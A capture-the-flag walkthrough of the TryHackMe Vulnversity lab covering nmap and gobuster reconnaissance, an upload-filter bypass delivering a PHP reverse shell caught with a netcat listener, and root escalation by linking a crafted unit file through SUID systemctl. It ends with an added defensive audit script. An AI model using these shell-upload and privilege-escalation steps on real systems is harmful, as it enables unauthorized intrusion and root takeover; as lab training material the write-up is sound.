1 — OffSec Path — TryHackMe — Vulnversity
Learn about active recon, web app attacks, and privilege escalation.
Machine Information:
NMAP Cheat Sheet:
Reconnaissance
1. Scan the box. How many ports are open?
sudo nmap -PS 10.10.213.40
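-PS == TCP SYN discovery probes to the given ports (nmap -h lists it as -PS/PA/PU/PY: TCP SYN/ACK, UDP or SCTP discovery to given ports). It only changes host discovery; the port scan itself still covers nmap's default 1,000 most common ports.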
2. What version of the squid proxy is running on the machine?
Note — squid proxy runs on port 3128 as shown on Port discovery scan.
sudo nmap -sV -p 3128 10.10.213.40
-sV == Probe open ports to determine service/version info.
-p 3128 == Restricts the scan to TCP port 3128.
3. How many ports will nmap scan if the flag -p-400 was used?
sudo nmap -p-400 10.10.213.40
-p-400 == scans ports 1 through 400, i.e. 400 ports (a range, not the 400 most common ports; that would be --top-ports 400)
4. Using the nmap flag -n what will it not resolve?
nmap -h
5. What is the most likely operating system this machine is running?
sudo nmap -O -sV 10.10.213.40
-O == OS Scan
-sV ==Version scan
6. What port is the web server running on?
Locating directories using GoBuster
7. What is the directory that has an upload form page?
gobuster dir -u http://10.10.213.40:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 2>/dev/null
Compromise the webserver
8. Run this attack, what extension is allowed?
Test other extension files to determine what is allowed.
Values to test according to the Hints.
Only the .phtml extension does not contain the “Extension not allowed” error message.
Exploitation
Edit exploit and make it executable:
nano php-reverse-shell.phtml
chmod +x php-reverse-shell.phtml
Upload exploit to the target machine:
Set up a netcat listener on the attacker machine and execute the exploit on the target machine:
nc -lvnp 4444
http://10.10.213.40:3333/internal/uploads/php-reverse-shell.phtml
And we got shell…
9. What is the name of the user who manages the webserver?
10. What is the user flag?
Privilege Escalation
11. On the system, search for all SUID files. What file stands out?
find / -perm -4000 2>/dev/null
Escalate privilege:
12. Become root and get the last flag (/root/root.txt)
nc -lvnp 4444 == setup a netcat listener on the attacker machine
First we create a variable that holds a unique file name ending in .service.
eop=$(mktemp).service
Then we create a unit file and write it to the file named by the variable.
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $eop
The ExecStart line of the unit file has the shell run cat on /root/root.txt and redirect the output to a file called output in /tmp. Finally we use the /bin/systemctl program to link and enable the unit file; systemd then runs the service as root.
/bin/systemctl link $eop
Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
/bin/systemctl enable --now $eop
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
Let’s see if it worked….
ls -lah /tmp
cat /tmp/output
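The escalation above depends on a SUID bit on /bin/systemctl and leaves unit symlinks in /etc/systemd/system that point into /tmp. The following audit script is an added example, not part of the original write-up; the function names and the baseline file /etc/suid-baseline.txt are assumptions.

```shell
#!/bin/sh
# Added example: audit for the two artifacts of the escalation shown above.
# Function names and the baseline file path are hypothetical.

# Print SUID files under $1 that are missing from the newline-separated
# allowlist passed as $2 (a baseline taken from a known-good install).
unexpected_suid() (
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r f; do
        printf '%s\n' "$2" | grep -qxF -- "$f" || printf '%s\n' "$f"
    done
)

# Print "link -> target" for .service symlinks under $1 whose target sits in
# a world-writable directory, as `systemctl link` and `enable` create them.
suspicious_unit_links() (
    find "$1" -type l -name '*.service' 2>/dev/null | sort |
    while IFS= read -r link; do
        target=$(readlink "$link")
        case $target in
            /tmp/*|/var/tmp/*|/dev/shm/*)
                printf '%s -> %s\n' "$link" "$target" ;;
        esac
    done
)

# Scan the live system only when asked: sh suid_unit_audit.sh --scan
if [ "${1:-}" = "--scan" ]; then
    unexpected_suid / "$(cat /etc/suid-baseline.txt 2>/dev/null)"
    suspicious_unit_links /etc/systemd/system
fi
```

On a host in the state shown above, the first function reports /bin/systemctl unless it is in the baseline, and the second reports both symlinks that systemctl printed.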